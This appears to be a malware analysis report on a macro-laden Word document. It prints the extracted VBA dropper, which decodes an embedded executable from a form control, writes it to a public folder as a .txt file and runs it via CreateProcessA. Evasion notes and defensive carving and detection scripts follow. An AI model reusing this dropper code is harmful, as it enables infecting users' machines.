Verdict: MALICIOUS
Risk score: 310
Heuristic findings: 10
ClamAV: Ole2.Macro.Agent-9858864-1 [critical] (CLAMAV_DETECTION)
ClamAV detected this file as malware: Ole2.Macro.Agent-9858864-1
VBA macros detected [medium] (OLE_VBA_MACROS), 3 related findings
Document contains VBA macro code.
Embedded PE decoded from VBA/UserForm payload string [critical] (OLE_VBA_EMBEDDED_PE_DROPPER)
The VBA macro carries a Windows executable encoded as a base64 or hex string, either split across macro string literals or stored in a UserForm control's text (e.g. TextBox1.Text), and rebuilds it at run time, typically writing it to %ProgramData% or %TEMP% (ADODB.Stream or binary Put) and executing it via WScript.Shell or cmd.exe. The payload is embedded in the document, not downloaded, and never appears as a contiguous executable inside the document file, so URL recovery and the raw embedded-EXE scan miss it. The analyzer decoded it into a valid PE (MZ header, DOS stub, PE header); a benign document does not carry an executable in its macro or form strings. The dropped payload has been carved for full extracted-file analysis.
In this sample (see the macros.bas preview below): Document_Open reads the base64 string from the UserForm control UserForm1.bodf90, decodes it through an MSXML2.DOMDocument element with DataType "bin.base64", writes the bytes with a binary Put to C:\Users\Public\ui.txt and starts that file directly through a declared CreateProcessA import from kernel32. No WScript.Shell or cmd.exe is involved, so child-process rules keyed on those intermediaries will not fire, and the .txt extension does not stop execution: CreateProcess loads the file as a PE image regardless of its name.
CreateObject call [high] (OLE_VBA_CREATEOBJ)
Matched line in script: Set xmlObj = CreateObject("MSXML2.DOMDocument.6.0")

Document_Open macro [low] (OLE_VBA_DOCOPEN)
Matched line in script: Private Sub Document_Open()
Document_Open runs automatically when the document is opened with macros enabled; here it is the entry point that decodes and launches the payload.
Heap-spray pattern detected [high] (SC_HEAP_SPRAY)
Repeated 0x41 ('A') bytes found. Disassembly hidden: these bytes score as degenerate, not coherent x86 code (a single mnemonic, inc, is 100% of instructions; a sled or padding/filler run, not program logic).

Reference to CreateProcess API [high] (SC_STR_CREATEPROCESS)
The string CreateProcess appears in the sample (the macro declares CreateProcessA from kernel32; see the preview below).

NOP-equivalent sled detected [medium] (SC_NOP_EQUIV_SLED)
Long run of 0x41 bytes. Disassembly hidden: these bytes score as data, not coherent x86 code (3/8 branch targets land on an instruction boundary, 38% coherence).

Caveat on the two 0x41 findings: base64 encodes every three zero bytes as "AAAA", so a base64-encoded PE, whose headers and section slack are largely zero-filled, necessarily contains long runs of 0x41. The analyzer itself rates the bytes as filler rather than code. In this sample the run is consistent with the base64 payload stored in the UserForm control, not with a separate heap-spray or NOP-sled shellcode, so treat these two findings as corroborating the embedded-PE dropper finding rather than as independent exploitation indicators.
Suspicious extracted artifact [medium] (EXTRACTED_FILE_STATIC_TRIAGE)
One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL [info] (EMBEDDED_URL)
One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the standard DrawingML XML namespace identifier present in any Office document that contains pictures or shapes; it is not contacted at run time and is not an indicator on its own.
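The carving step behind the embedded-PE finding above, as an added example that is not part of the analyzer or of the report: it takes the text that a macro/form-string extractor would produce, rejoins base64 split across `&`-concatenated string literals, decodes every long base64 (and, going beyond this sample, hex) run, and keeps only blobs that pass the MZ / e_lfanew / "PE\0\0" checks. It also reports the longest run of 'A' in the encoded string, which is what the 0x41 heuristics above keyed on. The sample text and the PE-shaped blob are constructed here; the blob is synthetic, has no code and only mimics the header layout, and the control name bodf90 is taken from the macro in this report.

```python
import base64
import binascii
import hashlib
import re
import struct

# --- constructed sample input ------------------------------------------------
def build_fake_pe() -> bytes:
    """Synthetic PE-shaped blob: DOS header, e_lfanew, 'PE\\0\\0' + COFF header.
    It stands in for the real 804352-byte payload and cannot run."""
    dos = bytearray(b"MZ" + b"\x00" * 0x3E)            # 64-byte IMAGE_DOS_HEADER
    struct.pack_into("<I", dos, 0x3C, 0x80)             # e_lfanew -> PE header at 0x80
    blob = dos + b"This program cannot be run in DOS mode.\r\n$"
    blob += b"\x00" * (0x80 - len(blob))                # zero padding -> "AAAA..." in base64
    # Signature + IMAGE_FILE_HEADER: Machine=i386, 1 section, SizeOfOptionalHeader=0xE0
    blob += b"PE\x00\x00" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x102)
    blob += b"\x00" * 256                               # zero-filled slack
    return bytes(blob)

def build_sample_text() -> str:
    """What a form-string/macro extractor would hand us (constructed): the
    UserForm control text and a second copy split across string literals."""
    b64 = base64.b64encode(build_fake_pe()).decode()
    chunks = [b64[i:i + 76] for i in range(0, len(b64), 76)]
    split_literal = '" & _\n    "'.join(chunks)
    return (
        "Private Sub Document_Open()\n"
        "    appBytes = Base64Decode(UserForm1.bodf90.Text)\n"
        "End Sub\n"
        "--- form strings ---\n"
        f'bodf90.Text = "{b64}"\n'
        f'Dim s As String: s = "{split_literal}"\n'
    )

# --- carving logic -----------------------------------------------------------
SPLIT_RE = re.compile(r'"\s*&\s*_?\s*"')               # "abc" & _ <newline> "def"
B64_RE = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")
HEX_RE = re.compile(r"(?:[0-9A-Fa-f]{2}){64,}")

def collapse_split_literals(text: str) -> str:
    """Rejoin a string literal that was split with & (and line continuation)."""
    return SPLIT_RE.sub("", text)

def decode_candidates(text: str):
    """Yield (encoding, encoded_string, decoded_bytes) for every long base64/hex run."""
    collapsed = collapse_split_literals(text)
    for m in B64_RE.finditer(collapsed):
        s = m.group() + "=" * (-len(m.group()) % 4)     # repair missing padding
        try:
            yield "base64", m.group(), base64.b64decode(s, validate=True)
        except (binascii.Error, ValueError):
            continue
    for m in HEX_RE.finditer(collapsed):
        yield "hex", m.group(), bytes.fromhex(m.group())

def looks_like_pe(blob: bytes) -> bool:
    """MZ magic, sane e_lfanew, and the PE signature where e_lfanew points."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    return 0x40 <= e_lfanew <= len(blob) - 24 and blob[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"

def longest_run(s: str, ch: str) -> int:
    best = cur = 0
    for c in s:
        cur = cur + 1 if c == ch else 0
        best = max(best, cur)
    return best

def carve_embedded_pe(text: str) -> list[dict]:
    """Return one record per distinct PE rebuilt from the extracted strings."""
    found, seen = [], set()
    for encoding, encoded, blob in decode_candidates(text):
        if not looks_like_pe(blob):
            continue
        digest = hashlib.sha256(blob).hexdigest()
        if digest in seen:                              # same payload, two copies
            continue
        seen.add(digest)
        e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
        found.append({
            "encoding": encoding,
            "size": len(blob),
            "sha256": digest,
            "machine": hex(struct.unpack_from("<H", blob, e_lfanew + 4)[0]),
            "longest_0x41_run": longest_run(encoded, "A"),  # the 'A' sled the heuristics saw
        })
    return found

if __name__ == "__main__":
    for hit in carve_embedded_pe(build_sample_text()):
        print(hit)
```

The `longest_0x41_run` value on the synthetic blob is already in the hundreds, which is why a string-level shellcode heuristic fires on a base64 PE; the header checks, not the 'A' run, are what establish that an executable is present.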
Extracted artifacts: 2
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5815 bytes | 8f927deadde23cbbed0efc452afd9e0e28aff84df1ada8b081539f981ca48624 |

Preview of macros.bas (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare PtrSafe Function CreateProcessA Lib "kernel32" ( _
ByVal lpApplicationName As String, _
ByVal lpCommandLine As String, _
ByVal lpProcessAttributes As LongPtr, _
ByVal lpThreadAttributes As LongPtr, _
ByVal bInheritHandles As Long, _
ByVal dwCreationFlags As Long, _
ByVal lpEnvironment As LongPtr, _
ByVal lpCurrentDirectory As String, _
lpStartupInfo As Any, _
lpProcessInformation As Any) As Long
Private Declare PtrSafe Function CloseHandle Lib "kernel32" ( _
ByVal hObject As LongPtr) As Long
Private Type STARTUPINFO
cb As Long
lpReserved As LongPtr
lpDesktop As LongPtr
lpTitle As LongPtr
dwX As Long
dwY As Long
dwXSize As Long
dwYSize As Long
dwXCountChars As Long
dwYCountChars As Long
dwFillAttribute As Long
dwFlags As Long
wShowWindow As Integer
cbReserved2 As Integer
lpReserved2 As LongPtr
hStdInput As LongPtr
hStdOutput As LongPtr
hStdError As LongPtr
End Type
Private Type PROCESS_INFORMATION
hProcess As LongPtr
hThread As LongPtr
dwProcessId As Long
dwThreadId As Long
End Type
Function Base64Decode(ByVal base64String As String) As Byte()
Dim xmlObj As Object
Dim nodeObj As Object
Set xmlObj = CreateObject("MSXML2.DOMDocument.6.0")
Set nodeObj = xmlObj.createElement("b64")
nodeObj.DataType = "bin.base64"
nodeObj.Text = base64String
Base64Decode = nodeObj.nodeTypedValue
End Function
Sub Run_e(ByVal exePath As String)
On Error GoTo ErrorHandler
Dim si As STARTUPINFO
Dim pi As PROCESS_INFORMATION
Dim ret As Long
si.cb = LenB(si)
ret = CreateProcessA(exePath, vbNullString, 0, 0, 0, 0, 0, vbNullString, si, pi)
If ret <> 0 Then
CloseHandle pi.hProcess
CloseHandle pi.hThread
Else
MsgBox "Failed to start process: " & Err.Description
End If
Exit Sub
ErrorHandler:
MsgBox "Error in Run_e: " & Err.Description
End Sub
Sub SmartToggle()
On Error GoTo ErrorHandler
Dim doc As Document
Set doc = ActiveDocument
Dim img1 As Shape, img2 As Shape
Set img1 = doc.Shapes("FullImage1")
Set img2 = doc.Shapes("FullImage2")
If img1.AlternativeText = "Front" Then
img1.WrapFormat.Type = wdWrapBehind
img2.WrapFormat.Type = wdWrapFront
img2.ZOrder msoBringToFront
img1.AlternativeText = "Back"
img2.AlternativeText = "Front"
Else
img2.WrapFormat.Type = wdWrapBehind
img1.WrapFormat.Type = wdWrapFront
img1.ZOrder msoBringToFront
img1.AlternativeText = "Front"
img2.AlternativeText = "Back"
End If
Exit Sub
ErrorHandler:
MsgBox "Error: " & Err.Description
End Sub
Private Sub Document_Open()
On Error GoTo ErrorHandler
SmartToggle
Dim pathh As String
Dim appBytes() As Byte
Dim fileNum As Integer
pathh = "C:\Users\Public\ui.txt"
appBytes = Base64Decode(UserForm1.bodf90.Text)
fileNum = FreeFile
Open pathh For Binary Access Write As #fileNum
Put #fileNum, 1, appBytes
Close #fileNum
Run_e pathh
Exit Sub
ErrorHandler:
MsgBox "Error in Document_Open: " & Err.Description
End Sub
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{919618CB-62F5-4C41-BE37-81DFF65F57CA}{1FFE6BE1-856B-429D-980A-A968B67887C8}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub bodf90_Change()
End Sub
Attribute VB_Name = "Module1"
Sub CreateFullPageImages_NoFade()
On Error GoTo ErrorHandler
Dim doc As Document
Set doc = ActiveDocument
' Delete existing shapes
Do While doc.Shapes.Count > 0
doc.Shapes(1).Delete
Loop
' Page dimensions
Dim pageWidth As Single, pageHeight As Single
pageWidth = doc.PageSetup.pageWidth
pageHeight = doc.PageSetup.pageHeight
' Margin offsets
Dim leftMargin As Single, topMargin As Single
leftMargin = doc.PageSetup.leftMargin
topMargin = doc.PageSetup.topMargin
' Add first image
Dim img1 As Shape
Set img1 = doc.Shapes.AddPicture( _
FileName:="C:\Users\jojo\Desktop\im\Image1.jpg", _
LinkToFile:=False, _
SaveWithDocument:=True, _
Left:=-leftMargin, _
Top:=-topMargin, _
Width:=pageWidth, _
Height:=pageHeight)
img1.LockAspectRatio = msoFalse
img1.WrapFormat.Type = wdWrapBehind
img1.Name = "FullImage1"
img1.AlternativeText = "Back"
' Add second image
Dim img2 As Shape
Set img2 = doc.Shapes.AddPicture( _
FileName:="C:\Users\jojo\Desktop\im\Image2.jpg", _
LinkToFile:=False, _
SaveWithDocument:=True, _
Left:=-leftMargin, _
Top:=-topMargin, _
Width:=pageWidth, _
Height:=pageHeight)
img2.LockAspectRatio = msoFalse
img2.WrapFormat.Type = wdWrapFront
img2.Name = "FullImage2"
img2.AlternativeText = "Front"
img2.ZOrder msoBringToFront
MsgBox "Images created and initialized!"
Exit Sub
ErrorHandler:
MsgBox "Error: " & Err.Description
End Sub

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vba_embedded_payload.bin | vba-embedded-pe | decoded from a hex/base64 payload string in a VBA UserForm control or macro literal (here: base64 in UserForm1.bodf90.Text) | 804352 bytes | 69c0c0d0cdfcebb698d952751f28f914a67f67a5e1bd81b4a1a4529ee7b78cbe |

Detection results for vba_embedded_payload.bin:
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 shell/COM execution token(s).

The ClamAV hit on the parent document (Ole2.Macro.Agent-9858864-1) is a macro signature, not a signature on this executable: the carved 804352-byte PE is unknown to ClamAV, so its behaviour has to be established by further static or dynamic analysis, and the SHA-256 above is the value to pivot on.
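The run-time behaviour visible in the macro (Word writes the decoded PE to C:\Users\Public\ui.txt, then starts that file with CreateProcessA, without cmd.exe or WScript.Shell in between) is what host telemetry can catch even when the carved PE has no signature. The following triage over Sysmon-style events is an added example, not part of the report: it flags an Office process spawning a child from a user-writable drop directory or with a non-executable extension, and correlates a FileCreate by Office with a later ProcessCreate of the same path. The events are constructed, and the field names (EventID 1 ProcessCreate with Image/ParentImage, EventID 11 FileCreate with Image/TargetFilename) are assumed to follow Sysmon's schema.

```python
import ntpath

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe"}
DROP_DIRS = ("c:\\users\\public\\", "c:\\programdata\\", "\\appdata\\local\\temp\\")
EXEC_EXTS = (".exe", ".com", ".scr", ".pif", ".cpl")

# Constructed Sysmon-like events (not real telemetry), in chronological order.
# Paths mirror the sample: Word drops ui.txt under C:\Users\Public and runs it.
WINWORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
EVENTS = [
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe", "Image": WINWORD,
     "CommandLine": r'"WINWORD.EXE" /n C:\Users\jojo\Desktop\sample.docm'},
    {"EventID": 11, "Image": WINWORD, "TargetFilename": r"C:\Users\Public\ui.txt"},
    {"EventID": 1, "ParentImage": WINWORD, "Image": r"C:\Users\Public\ui.txt",
     "CommandLine": r"C:\Users\Public\ui.txt"},      # lpCommandLine was NULL, so it equals the path
    {"EventID": 1, "ParentImage": WINWORD, "Image": r"C:\Windows\splwow64.exe",
     "CommandLine": r"C:\Windows\splwow64.exe 12288"},   # ordinary print-spooler helper, benign
]

def _base(path: str) -> str:
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()

def triage(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Replay events in order; return (event index, reasons) for every suspicious ProcessCreate."""
    written_by_office: set[str] = set()
    hits = []
    for i, ev in enumerate(events):
        if ev["EventID"] == 11 and _base(ev["Image"]) in OFFICE_IMAGES:
            written_by_office.add(ev["TargetFilename"].lower())   # remember what Office dropped
            continue
        if ev["EventID"] != 1:
            continue
        image = ev["Image"].lower()
        reasons = []
        if _base(ev["ParentImage"]) in OFFICE_IMAGES:
            if any(d in image for d in DROP_DIRS):
                reasons.append("office-spawned-from-drop-dir")
            if not image.endswith(EXEC_EXTS):
                # CreateProcess does not care about the extension; an allow rule on *.exe would
                reasons.append("office-spawned-non-exe-extension")
        if image in written_by_office:
            reasons.append("office-wrote-then-executed")
        if reasons:
            hits.append((i, reasons))
    return hits

if __name__ == "__main__":
    for idx, why in triage(EVENTS):
        print(idx, EVENTS[idx]["Image"], why)
```

The write-then-execute correlation is the most specific of the three signals: it does not depend on the drop directory or on the file extension the author chose, only on Office both creating and then launching the same path.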